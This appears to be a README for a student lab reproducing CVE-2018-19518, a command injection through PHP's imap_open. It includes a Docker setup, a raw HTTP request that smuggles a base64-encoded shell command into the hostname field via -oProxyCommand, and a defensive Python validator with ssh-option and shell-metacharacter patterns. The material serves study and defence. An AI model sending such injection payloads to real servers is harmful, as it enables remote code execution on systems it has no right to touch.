Some work on CVE-2018-19518
==============
Latest report: https://gitlab.com/ensimag-security/CVE-2018-19518/-/jobs/artifacts/master/raw/rapport.pdf?job=PDF
## Usage
### run app
```console
docker-compose up -d
```
Example of normal usage of the web app:
- imap : webmail.grenoble-inp.org
- user : prenom.nom@grenoble-inp.org
- password : xxx
### exploit
Using ```echo '1234567890'>/tmp/test0001``` as the injected command (base64-encoded in the `hostname` field):
```
POST / HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 125

hostname=x+-oProxyCommand%3decho%09ZWNobyAnMTIzNDU2Nzg5MCc%2bL3RtcC90ZXN0MDAwMQo%3d|base64%09-d|sh}&username=111&password=222
```
### check
Open a shell in the container with ```docker-compose exec app bash``` and read the file with ```cat /tmp/test0001```.
## waf
- https://github.com/theonemule/docker-waf
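
The kind of check a WAF rule or the app itself can apply to the `hostname` field before it reaches `imap_open`, as an added example that is not code from this repository. The function names are hypothetical; the field name and both sample bodies are taken from the requests shown above. The allow-list match is the decisive test, the other findings are only there to make log entries readable.

```python
import re
from urllib.parse import parse_qs

# One DNS label, then a dotted host name with an optional :port.
LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
HOST_RE = re.compile(rf"{LABEL}(?:\.{LABEL})*(?::\d{{1,5}})?")
# An ssh-style "-oName=value" option at the start or after whitespace.
SSH_OPTION_RE = re.compile(r"(?:^|\s)-o\s*[A-Za-z]+\s*=")
SHELL_META_RE = re.compile(r"[|;&`$<>(){}\\]")


def check_hostname(value):
    """Return the reasons why `value` is not acceptable as a mail host."""
    findings = []
    if re.search(r"\s", value):
        findings.append("whitespace")
    if SSH_OPTION_RE.search(value):
        findings.append("ssh -o option")
    if SHELL_META_RE.search(value):
        findings.append("shell metacharacter")
    # Allow-list: anything that is not a plain host[:port] is rejected.
    if len(value) > 253 or not HOST_RE.fullmatch(value):
        findings.append("not a host name")
    return findings


def inspect_body(body, field="hostname"):
    """Decode a urlencoded form body and check every `field` value."""
    findings = []
    for value in parse_qs(body, keep_blank_values=True).get(field, []):
        findings.extend(check_hostname(value))
    return findings


# Body of the request in the "exploit" section of this page.
PAGE_BODY = ("hostname=x+-oProxyCommand%3decho%09ZWNobyAnMTIzNDU2Nzg5MCc"
             "%2bL3RtcC90ZXN0MDAwMQo%3d|base64%09-d|sh}&username=111&password=222")
# Normal login, built from the "run app" values on this page.
NORMAL_BODY = ("hostname=webmail.grenoble-inp.org"
               "&username=prenom.nom%40grenoble-inp.org&password=xxx")

if __name__ == "__main__":
    for name, body in (("page request", PAGE_BODY), ("normal login", NORMAL_BODY)):
        print(name, "->", inspect_body(body) or "ok")
```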
## Relevant commit
- https://git.php.net/?p=php-src.git;a=commit;h=e5bfea64c81ae34816479bb05d17cdffe45adddb
## References
- https://github.com/vulhub/vulhub/tree/master/php/CVE-2018-19518
- https://nvd.nist.gov/vuln/detail/CVE-2018-19518
- https://lab.wallarm.com/rce-in-php-or-how-to-bypass-disable-functions-in-php-installations-6ccdbf4f52bb
```
[4.0K] /data/pocs/f3fd9e0a6b8bde97378d2ee51139a3793c613e72
├── [4.0K] app
│   ├── [ 230] Dockerfile
│   └── [4.0K] www
│       └── [2.8K] index.php
├── [ 117] docker-compose-msf.yml
├── [ 139] docker-compose-waf.yml
├── [ 117] docker-compose.yml
├── [4.0K] docs
│   ├── [ 87K] edit-request.png
│   ├── [ 98K] firefox-dev.png
│   └── [785K] gmail.png
├── [4.0K] msf
│   ├── [ 230] Dockerfile
│   ├── [ 650] imap.php
│   └── [4.0K] www
│       └── [ 650] imap.php
├── [ 15K] rapport.md
├── [1.3K] README.md
└── [4.0K] waf
    ├── [ 30K] crs-setup.conf
    ├── [2.3K] Dockerfile
    ├── [1.3K] modsec_includes.conf
    ├── [8.5K] modsecurity.conf
    └── [3.2K] nginx.conf

6 directories, 18 files
```